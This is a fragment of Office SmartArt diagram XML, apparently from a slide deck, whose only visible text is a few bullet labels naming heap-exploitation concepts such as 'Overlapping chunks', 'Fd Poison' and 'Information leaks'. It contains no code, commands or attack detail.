      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p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X-Request-Id</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> header</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B5556B-2EC8-5744-927A-CF2456001600}" type="parTrans" cxnId="{A41EEF66-58E4-DA42-8B03-302393109C53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EE16389-BF54-AB42-AE30-352E94642F3A}" type="sibTrans" cxnId="{A41EEF66-58E4-DA42-8B03-302393109C53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" type="pres">
      <dgm:prSet presAssocID="{6455780C-6F8D-4255-9DD1-4810392A304D}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D7D5219-3153-B043-8F6F-455837EC0912}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{435EB0F3-CE16-0043-BF12-FBD3BF5072F2}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4D27442-3B5E-4041-A01F-811ED6A65763}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0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2DB808-CBA2-7244-9930-00C66C402802}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66674668-A517-5249-A4B0-42C941FE4E2C}" type="pres">
      <dgm:prSet presAssocID="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52715741-8929-5242-A1D9-E7E21EDA5E87}" type="pres">
      <dgm:prSet presAssocID="{62731443-70EE-448E-9362-3B3E7CF0E158}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8888F1A1-380E-6C48-B2ED-FE3CABA211FF}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C88DBD0-4DFF-3642-A179-3D6A0E72F79F}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CCC4A5B2-7D12-644A-8FDC-896B19751B9A}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBE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AA9946-3208-E247-9999-B8633FFB1B5C}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B375430D-94AF-B34E-9E93-A979F7FC1FF8}" type="pres">
      <dgm:prSet presAssocID="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{194D062B-080E-8740-AEC0-361E2A7C021C}" type="pres">
      <dgm:prSet presAssocID="{577B869B-09A3-4BDE-B8E5-6799843C857B}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BDC325A-09E1-4144-B986-E68C3E7A67DB}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65EF1D85-1E5B-6445-8E5F-35E7B6112379}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E45272AD-1D9F-4641-9EDC-868BAD3F0E98}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB5871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A0FB776-4E36-D04B-BD3E-F6388C789B0E}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34EB131E-ADD7-5543-9F8A-D05C6F05E011}" type="pres">
      <dgm:prSet presAssocID="{441B4E51-B22E-4F8E-929C-BF6ABEB5871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7126806-E068-B945-AB02-865ECAD1192A}" type="presOf" srcId="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" destId="{435EB0F3-CE16-0043-BF12-FBD3BF5072F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{57BFAE27-0004-48BC-9FEE-8587159DD4B7}" srcId="{6455780C-6F8D-4255-9DD1-4810392A304D}" destId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" srcOrd="1" destOrd="0" parTransId="{6A995CA6-9EE7-43A1-A44D-06D0098887CA}" sibTransId="{577B869B-09A3-4BDE-B8E5-6799843C857B}"/>
    <dgm:cxn modelId="{3513182C-3EB0-7441-8202-55BAF39457EB}" type="presOf" srcId="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" destId="{E45272AD-1D9F-4641-9EDC-868BAD3F0E98}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E61C5D5D-804C-46A1-A085-FF6E5073B15F}" srcId="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" destId="{3AF67123-79AA-41ED-8854-F4DB7C605695}" srcOrd="0" destOrd="0" parTransId="{555941CD-3722-4C83-8F11-D59C03D051B6}" sibTransId="{CFCDAD55-86CB-4EC2-BD37-94417C1B08CA}"/>
    <dgm:cxn modelId="{8201B464-8CEB-2344-BC16-3EDF96A292B0}" type="presOf" srcId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" destId="{3C88DBD0-4DFF-3642-A179-3D6A0E72F79F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A41EEF66-58E4-DA42-8B03-302393109C53}" srcId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" destId="{A50B4C53-0B8E-A745-8815-784B2F9F0501}" srcOrd="0" destOrd="0" parTransId="{25B5556B-2EC8-5744-927A-CF2456001600}" sibTransId="{6EE16389-BF54-AB42-AE30-352E94642F3A}"/>
    <dgm:cxn modelId="{7EE52269-C642-4297-9E02-372E5A8D056D}" srcId="{6455780C-6F8D-4255-9DD1-4810392A304D}" destId="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" srcOrd="2" destOrd="0" parTransId="{523ECD28-828F-4414-B9BE-D7F1C3118114}" sibTransId="{22766A84-7DD7-4223-B372-870DD6027338}"/>
    <dgm:cxn modelId="{55059282-1624-4300-A788-8AF2462836E5}" srcId="{6455780C-6F8D-4255-9DD1-4810392A304D}" destId="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" srcOrd="0" destOrd="0" parTransId="{4F954869-7C09-41D9-AFD0-E7DF73961C14}" sibTransId="{62731443-70EE-448E-9362-3B3E7CF0E158}"/>
    <dgm:cxn modelId="{653E64B5-D450-704D-B8F1-1552B78770D0}" type="presOf" srcId="{1F389213-35C6-4349-93DC-DCC636E2A0F9}" destId="{F4D27442-3B5E-4041-A01F-811ED6A65763}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{23BD0EBE-6246-FA4B-9BAE-1003779EA4AC}" type="presOf" srcId="{A50B4C53-0B8E-A745-8815-784B2F9F0501}" destId="{B375430D-94AF-B34E-9E93-A979F7FC1FF8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{188191D2-1C00-124C-82C5-9B9BA80439DD}" type="presOf" srcId="{441B4E51-B22E-4F8E-929C-BF6ABEB58711}" destId="{65EF1D85-1E5B-6445-8E5F-35E7B6112379}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A45985DF-FB9F-FF4E-AD36-CC28076B14FA}" type="presOf" srcId="{C17CFA38-BD6B-42A5-BF38-6AD85B2BBEC9}" destId="{CCC4A5B2-7D12-644A-8FDC-896B19751B9A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9DA329E0-06A9-CA4F-A10C-4A88871879E5}" type="presOf" srcId="{6455780C-6F8D-4255-9DD1-4810392A304D}" destId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5D0A2CFD-3991-6B43-A395-CA8C28161240}" type="presOf" srcId="{3AF67123-79AA-41ED-8854-F4DB7C605695}" destId="{66674668-A517-5249-A4B0-42C941FE4E2C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9F7E6000-4472-854D-A267-D782C6D43E7B}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{9D7D5219-3153-B043-8F6F-455837EC0912}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B73908D7-B963-5C4F-85BA-F90159FF5D33}" type="presParOf" srcId="{9D7D5219-3153-B043-8F6F-455837EC0912}" destId="{435EB0F3-CE16-0043-BF12-FBD3BF5072F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D0928F29-60F8-7641-9EA0-E3AAEF0988D2}" type="presParOf" srcId="{9D7D5219-3153-B043-8F6F-455837EC0912}" destId="{F4D27442-3B5E-4041-A01F-811ED6A65763}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DC7BC39E-C971-E248-967E-7B9767607E27}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{9E2DB808-CBA2-7244-9930-00C66C402802}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4DC7691E-1E3C-1F43-BC03-9100B98DB643}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{66674668-A517-5249-A4B0-42C941FE4E2C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{757034D7-8CBD-E243-8457-50D9CA1BA9DF}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{52715741-8929-5242-A1D9-E7E21EDA5E87}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{63834CEE-5A06-F041-983E-244098C558B5}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{8888F1A1-380E-6C48-B2ED-FE3CABA211FF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A76CF6BC-B0A6-4545-8213-9F66B4CBA8FF}" type="presParOf" srcId="{8888F1A1-380E-6C48-B2ED-FE3CABA211FF}" destId="{3C88DBD0-4DFF-3642-A179-3D6A0E72F79F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E46E9C75-3450-FE44-86CC-44457B4C03D3}" type="presParOf" srcId="{8888F1A1-380E-6C48-B2ED-FE3CABA211FF}" destId="{CCC4A5B2-7D12-644A-8FDC-896B19751B9A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5E208057-AC33-984C-940D-6FE62AEEF946}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{64AA9946-3208-E247-9999-B8633FFB1B5C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{127E6B3E-5536-364E-B317-87D977BA1920}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{B375430D-94AF-B34E-9E93-A979F7FC1FF8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0A07C9BB-E79F-1F40-A3F6-D255B43D9628}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{194D062B-080E-8740-AEC0-361E2A7C021C}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{70047705-E591-2248-9D33-472C78F5944B}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{6BDC325A-09E1-4144-B986-E68C3E7A67DB}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{67B402C9-38A9-1F4A-8E12-770C10D9BFA2}" type="presParOf" srcId="{6BDC325A-09E1-4144-B986-E68C3E7A67DB}" destId="{65EF1D85-1E5B-6445-8E5F-35E7B6112379}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{35D1A590-101B-B94A-AAC7-C8E24B07FB5E}" type="presParOf" srcId="{6BDC325A-09E1-4144-B986-E68C3E7A67DB}" destId="{E45272AD-1D9F-4641-9EDC-868BAD3F0E98}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E4F91B96-F7ED-5249-8903-4D71B6A8BA94}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{EA0FB776-4E36-D04B-BD3E-F6388C789B0E}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DA5E1E77-67DE-7F48-8DC9-7985D8E66324}" type="presParOf" srcId="{B9D2C5A6-F483-164F-8A75-13BE1CC4EC00}" destId="{34EB131E-ADD7-5543-9F8A-D05C6F05E01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DB67578-E72B-4CB9-9E97-9506C094623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FC6C035-55D4-4DCE-8774-26F62EEED8ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Overlapping chunks</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D2E8E50-AE0B-4791-B283-96A0276C0BFC}" type="parTrans" cxnId="{48730A1A-DA50-4A3C-95E9-49479E2DA7EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E751E930-5E16-4236-8EB9-C4DFD00F678B}" type="sibTrans" cxnId="{48730A1A-DA50-4A3C-95E9-49479E2DA7EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF880266-12B2-45EE-9D54-C76817831F7C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Fd Poison</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DA209EE-E26B-4FC6-BD9A-3987282CC8E5}" type="parTrans" cxnId="{0616C07E-6F52-44F4-B20A-B792708200A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98B4B280-2D56-4754-BD6D-5C1CF53AA000}" type="sibTrans" cxnId="{0616C07E-6F52-44F4-B20A-B792708200A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B8CB64D-0EA3-4F32-8801-C12A33586719}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Corrupt other important objects</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{084D6896-64E6-41B3-AD89-016CA37D9A66}" type="parTrans" cxnId="{52DF4B4B-43BF-41D3-B296-63C4F9A17890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AAB31A73-FB96-423E-87B0-523B253FD503}" type="sibTrans" cxnId="{52DF4B4B-43BF-41D3-B296-63C4F9A17890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83250952-F84C-4A6B-9812-6A443BB9A6E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Information leaks</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C59DB59B-1C13-490E-9FCF-5C8D1A4997A0}" type="parTrans" cxnId="{22601FC8-A97B-49B6-A3C4-0BFEB58C55C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AAF9BC6-396A-4C9A-BD13-9052F8AF7A93}" type="sibTrans" cxnId="{22601FC8-A97B-49B6-A3C4-0BFEB58C55C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" type="pres">
      <dgm:prSet presAssocID="{6DB67578-E72B-4CB9-9E97-9506C0946234}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{355997B0-3E33-5A49-9FBF-07B0FD038352}" type="pres">
      <dgm:prSet presAssocID="{DF880266-12B2-45EE-9D54-C76817831F7C}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C8469139-03BB-CA44-8777-2B0B568DE71E}" type="pres">
      <dgm:prSet presAssocID="{DF880266-12B2-45EE-9D54-C76817831F7C}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{973CB7B2-16D8-7F49-9FB8-AE2A52737AB1}" type="pres">
      <dgm:prSet presAssocID="{DF880266-12B2-45EE-9D54-C76817831F7C}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF893BCE-F4CC-ED49-95DC-A64A744D0E7E}" type="pres">
      <dgm:prSet presAssocID="{DF880266-12B2-45EE-9D54-C76817831F7C}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A240A55-8989-C64D-A7B3-8871B2A2D612}" type="pres">
      <dgm:prSet presAssocID="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F48FB5C-7DE3-D749-A570-B2EEF37E51C8}" type="pres">
      <dgm:prSet presAssocID="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{646F0876-EBC3-034F-A124-99E877C84DA0}" type="pres">
      <dgm:prSet presAssocID="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{03F097F3-E8F4-3345-B7D6-924AAC59545B}" type="pres">
      <dgm:prSet presAssocID="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0845AE79-0C4F-EC4C-98A8-7C4C74C03E65}" type="pres">
      <dgm:prSet presAssocID="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{723DD4A4-8B91-1240-B797-DC40AC969E18}" type="pres">
      <dgm:prSet presAssocID="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DCF075F6-CF4D-B84F-995C-FC8443EB7A11}" type="pres">
      <dgm:prSet presAssocID="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ADE0577C-D23F-CA4E-AAD9-0E21B4303C8B}" type="pres">
      <dgm:prSet presAssocID="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB3C8761-2F71-E84C-9775-EEDD68C4059E}" type="pres">
      <dgm:prSet presAssocID="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED36771E-34CD-404C-84E1-020F3F9FBABF}" type="pres">
      <dgm:prSet presAssocID="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9949052-758F-1A42-AC10-81AEC590F6AD}" type="pres">
      <dgm:prSet presAssocID="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42EB9C0B-EEBF-6746-9405-EB24F1D30D8C}" type="pres">
      <dgm:prSet presAssocID="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2671590A-CEB6-1341-9936-D390CC60F93D}" type="presOf" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BF927F12-6F5B-2245-B8DF-C87A82191630}" type="presOf" srcId="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" destId="{DCF075F6-CF4D-B84F-995C-FC8443EB7A11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{48730A1A-DA50-4A3C-95E9-49479E2DA7EC}" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" srcOrd="1" destOrd="0" parTransId="{4D2E8E50-AE0B-4791-B283-96A0276C0BFC}" sibTransId="{E751E930-5E16-4236-8EB9-C4DFD00F678B}"/>
    <dgm:cxn modelId="{52DF4B4B-43BF-41D3-B296-63C4F9A17890}" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{7B8CB64D-0EA3-4F32-8801-C12A33586719}" srcOrd="2" destOrd="0" parTransId="{084D6896-64E6-41B3-AD89-016CA37D9A66}" sibTransId="{AAB31A73-FB96-423E-87B0-523B253FD503}"/>
    <dgm:cxn modelId="{5C72934C-50B6-C645-A2C7-D336A3F496EF}" type="presOf" srcId="{DF880266-12B2-45EE-9D54-C76817831F7C}" destId="{973CB7B2-16D8-7F49-9FB8-AE2A52737AB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0616C07E-6F52-44F4-B20A-B792708200A0}" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{DF880266-12B2-45EE-9D54-C76817831F7C}" srcOrd="0" destOrd="0" parTransId="{7DA209EE-E26B-4FC6-BD9A-3987282CC8E5}" sibTransId="{98B4B280-2D56-4754-BD6D-5C1CF53AA000}"/>
    <dgm:cxn modelId="{2450C995-95F1-E049-A4C5-71D491F8E68E}" type="presOf" srcId="{EFC6C035-55D4-4DCE-8774-26F62EEED8ED}" destId="{646F0876-EBC3-034F-A124-99E877C84DA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{22601FC8-A97B-49B6-A3C4-0BFEB58C55C4}" srcId="{6DB67578-E72B-4CB9-9E97-9506C0946234}" destId="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" srcOrd="3" destOrd="0" parTransId="{C59DB59B-1C13-490E-9FCF-5C8D1A4997A0}" sibTransId="{7AAF9BC6-396A-4C9A-BD13-9052F8AF7A93}"/>
    <dgm:cxn modelId="{70FF4BF2-BC78-AD4C-B163-438AECAEBF3D}" type="presOf" srcId="{83250952-F84C-4A6B-9812-6A443BB9A6E9}" destId="{C9949052-758F-1A42-AC10-81AEC590F6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DAD59A2C-C844-4D45-B8B0-5703A42CCF6A}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{355997B0-3E33-5A49-9FBF-07B0FD038352}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
